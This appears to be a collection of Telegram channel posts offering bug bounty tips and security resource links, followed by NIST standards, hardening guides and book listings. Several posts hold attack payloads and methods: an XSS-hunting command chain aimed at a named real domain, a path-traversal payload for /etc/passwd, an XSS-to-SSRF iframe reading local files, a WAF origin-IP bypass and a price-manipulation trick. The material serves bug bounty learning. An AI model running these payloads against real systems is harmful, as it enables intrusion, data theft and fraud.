Public Bug Bounty Programs [Domain,Subdomain]
https://github.com/trickest/inventory

Public Bug Bounty Platforms Around The World
https://platforms.disclose.io/

Public Bug Bounty/ Penetration Testing Reports
https://github.com/reddelexc/hackerone-reports
https://github.com/juliocesarfort/public-pentesting-reports

Bug Bounty Books
https://github.com/akr3ch/BugBountyBooks
https://github.com/AnLoMinus/Bug-Bounty

Bug Bounty Youtube Channel
https://www.youtube.com/@BugBountyReportsExplained
https://www.youtube.com/@NahamSec
https://www.youtube.com/@STOKfredrik
https://www.youtube.com/channel/UCyBZ1F8ZCJVKSIJPrLINFyA
https://www.youtube.com/@InsiderPhD

Bug Bounty Hunter Twitter/Blog/etc
https://twitter.com/thedawgyg?lang=en
https://twitter.com/d00xing?lang=en
https://m0chan.github.io/
https://twitter.com/codecancare
http://ele7enxxh.com/
https://twitter.com/ele7enxxh?lang=en
https://twitter.com/orange_8361?lang=en
https://twitter.com/_godiego__?lang=en

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

Find xss with this automation of the following work
1 subfinder -d indeed.com -o indeed.txt //Find Subdomains
2 httpx -l subdomains.txt -o httpx.txt // Live Subdomains
3 echo "indeed.com" | gau --threads 5 >> Enpoints.txt // Find Endpoints
4 cat httpx.txt | katana -jc >> Enpoints.txt // Find More Endpoints
5 cat Enpoints.txt | uro >> Endpoints_F.txt // Remove Duplicates
6 cat Endpoints_F.txt | gf xss >> XSS.txt // Filter Endpoints for XSS
7 cat XSS.txt | Gxss -p khXSS -o XSS_Ref.txt // Find reflected Parameters
8 dalfox file XSS_Ref.txt -o Vulnerable_XSS.txt // Find XSS

Script https://github.com/dirtycoder0124/xss

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

💎LFI TIP BY KANAHIYA💎

1- on visiting url http://domain.tld it were redirecting first to http://domain.tod/dir1/dir2 then to sso login

2- Fuzzed after first redirection

3- http://domain.tld/dir1/dir2/FUZZ

4- this payload leads to 200 ok & disclosed all local files

////////////////../../../../../../../../etc/passwd

5- tried other local files
/etc/hosts
/etc/shells
/proc/self/environ
/bin/sh

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

Bug Bounty Tips: Discovering the Origin IP by scanning your target IP range

When you're hunting on a bug bounty target and WAF stands in your way, here's a powerful technique to uncover the Origin IP by scanning the target's IP range.

We'll be using a simple yet effective tool called hakoriginfinder by hakluke! Get it at https://github.com/hakluke/hakoriginfinder

Here's my methodology to find the Origin IP using this tool and technique:

Discover your target's ASN and check https://bgp.he.net/AS33848#_prefixes?

Make a note of the target's IP range.
Assuming you have a WAF-protected domain called example[.]com. Use this command with the IP range Identified in step 1 and pass your target host against the -h parameter:

prips 93.184.216.0/24 | hakoriginfinder -h example[.]com

If you receive a "MATCH" output, there's a strong likelihood that you've successfully identified the Origin IP. Now, you can send requests with the same Host header to bypass WAF or for whatever your mission requires. Happy hunting!

credit:- Jayesh

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

Use these tools to bypass 403 most time it give false postive always check for content length.Both tool bypass protocol based,header based,path based and more techniques.
https://github.com/Dheerajmadhukar/4-ZERO-3
https://github.com/yunemse48/403bypasser

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

⭐️𝐗𝐒𝐒 𝐭𝐨 𝐒𝐒𝐑𝐅 (𝐌𝐞𝐭𝐡𝐨𝐝 𝟐)⭐️

* Note this only works if proper sanitization is not performed and the server processes the payload server-side *

Input the following code in the vulnerable field:
<iframe src="http://localhost/some/directory"></iframe>

You can also read local files:
<iframe src="file:///C:/Windows/win.ini" width="500" height="500">

This is especially critical if an application is running on an EC2 instance that does not have IMDSv2 required.

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

Price Manipulation Method

If the product price parameter cannot be changed, change the quantity of products.

items[1][quantity]=1 --> 234 €
items[1][quantity]=0.1 --> 23.4 €

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

You can now passively enumerate all endpoints of a website with katana. (No need waybackurls)

Example:

echo nasa.gov | katana -passive -f qurl -pss waybackarchive,commoncrawl,alienvault | tee endpoints

You can then check the status of these endpoints or filter in order to find new vulnerabilities:

Example:

echo nasa.gov | katana -passive -f qurl -pss waybackarchive,commoncrawl,alienvault | httpx -mc 200 | grep -E '\.(js|php)$' | tee specificEndpoints

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

دزدی داده از طریق ICMP

https://blog.bwlryq.net/posts/icmp_exfiltration

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer/

پرورش استعداد ها در امنیت سایبری

راهکار استراتژیک
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

Infographics
The DoD Cybersecurity Policy Chart,
October 2024.
https://csiac.org/resources/the-dod-cybersecurity-policy-chart

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

Infosec Standards
NIST SP 800-63B-4:
"Digital Identity Guidelines. Authentication and Authenticator Management", August 2024.

NIST SP 800-63-4:
"Digital Identity Guidelines"
https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-63-4.2pd.pdf

NIST SP 800-63A-4:
"Identity Proofing and Enrollment"
https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-63A-4.2pd.pdf

NIST SP 800-63C-4:
"Federation and Assertions"
https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-63C-4.2pd.pdf


National Institute of Standards and Technology (NIST)

——————————————————
#CyberSecurity #vCISO #NIST #AAA

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

Hardening
Enhanced Visibility and Hardening Guidance for Communications Infrastructure 2024.:

Network Infrastructure Security Guide, ver.1.2
https://media.defense.gov/2022/Jun/15/2003018261/-1/-1/0/CTR_NSA_NETWORK_INFRASTRUCTURE_SECURITY_GUIDE_20220615.PDF

Cisco Guide to Securing NX-OS Devices
https://sec.cloudapps.cisco.com/security/center/resources/securing_nx_os.html

Cisco IOS XE Hardening Guide, 2024
https://www.cisco.com/c/en/us/support/docs/ios-nx-os-software/ios-xe-16/220270-use-cisco-ios-xe-hardening-guide.html

——————————————————
#CyberSecurity #vCISO #CISA #Hardening
#SecureBusinessContinuity

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

Tech book
API Security for White Hat Hackers: Uncover offensive defense strategies and get up to speed with secure API implementation 2024.

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

Research
Unveiling Mac Security:
A Comprehensive Exploration of Sandboxing and AppData TCC 2024.
https://github.com/guluisacat/MySlides/tree/main/BlackHatUSA2024_KCon2024

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

Tech book
Ethical Password Cracking:
Decode passwords using John the Ripper, hashcat, and advanced methods for password breaking 2024.

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

Techbook
Malware Development:
The result of self-research and investigation of malware development tricks, evasion techniques and persistence 2022.

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

DFIR
Techbook
A Practical Hands-on Approach to Database Forensics.

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer